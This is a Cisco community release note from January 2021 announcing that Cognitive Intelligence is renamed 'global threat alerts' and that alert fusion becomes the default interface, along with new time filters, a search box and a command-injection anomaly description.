Buy or Renew
Buy or Renew
Duo Security forums now LIVE! Get answers to all your Duo Security questions. Learn more
cancel
Turn on suggestions
Auto-suggest helps you quickly narrow down your search results by suggesting possible matches as you type.
Showing results for 
Search instead for 
Did you mean: 
cancel
Create a new blog
1854
Views
5
Helpful
0
Comments

Cognitive Release Note, January 2021: Cognitive Intelligence changes its name to "global threat alerts" and alert fusion will be the default web interface

aligarci
Cisco Employee
Cisco Employee
‎02-01-2021 10:34 AM

User Experience Enhancements

cx.png

As part of the Cisco Common User Experience program, we are working towards a more uniform user experience and terminology alignment. This program runs across all Cisco security products.

 

Cognitive Intelligence changing its name to global threat alerts

As part of Cisco’s continuous efforts to bring more clarity into our security portfolio, Cognitive Intelligence will be changing its name to global threat alerts. You will start seeing the new name in the web interface, documentation, and other places soon.

 

Starting February 2nd, the new web interface with alert fusion will be the default view

The alert fusion interface, introduced last summer as a beta version accessible using the early access switch, will now be the default view of the web interface.

Picture 1.png

Figure 1: Alert fusion interface will be the default view starting February 2nd

 

Due to the changes in the way that alerts are fused together, the global threat alerts (formerly Cognitive Intelligence) widget in Secure Network Analytics (formerly Stealthwatch Enterprise) is also changing its look.

widget.jpg

Figure 2: New look of global threat alerts inside Secure Network Analytics dashboard

 

New features added to the alert fusion interface

Time filter

Now you can filter by time in a fast and convenient way. You can choose from the list of the most-used options (last day, last 7 days, last 30 days, and last 45 days) or specify starting and ending dates.

Picture 1 copy.png

 Figure 3: Filter by time with one click using any of the most-used options

 

Open search box

In order to ease your threat investigations, now you can use the open search box to quickly filter and find alerts for a specific username, client IP address, asset group, or  type of threat.

Picture 1 copy 2.png

 Figure 4: Filter your alerts by username, client IP address, asset group, or threat name

 

New descriptions added for command-injection classifier

This anomaly will trigger if a specific pattern is found in the user agent of the http request. The presence of these patterns gives us certainty that the webpage was accessed with the intention of exploiting a vulnerability. This can signal recognition steps in order to initiate an attack against that web page.

This anomaly can be seen in  Alert -> Alert detail -> Anomalies

annotation.png

Figure 5: New anomaly for command-injection exploitation attempt

 

 

Leveraging global threat alerts (Cognitive Intelligence)

Global threat alerts (Formerly Cognitive Intelligence) capabilities are available to Secure Endpoint (Formerly Advanced Malware Protection or AMP for endpoints) customers with a compatible web proxy such as the Secure Web Appliance (Formerly Web Security Appliance), and all Secure Network Analytics (Formerly Stealthwatch Enterprise) customers. Reach out to your account executive to learn how to turbocharge your existing cybersecurity investment with global threat alerts.

Getting Started

Find answers to your questions by entering keywords or phrases in the Search bar above. New here? Use these resources to familiarize yourself with the community:

Popular Articles
Customers Also Viewed These Support Documents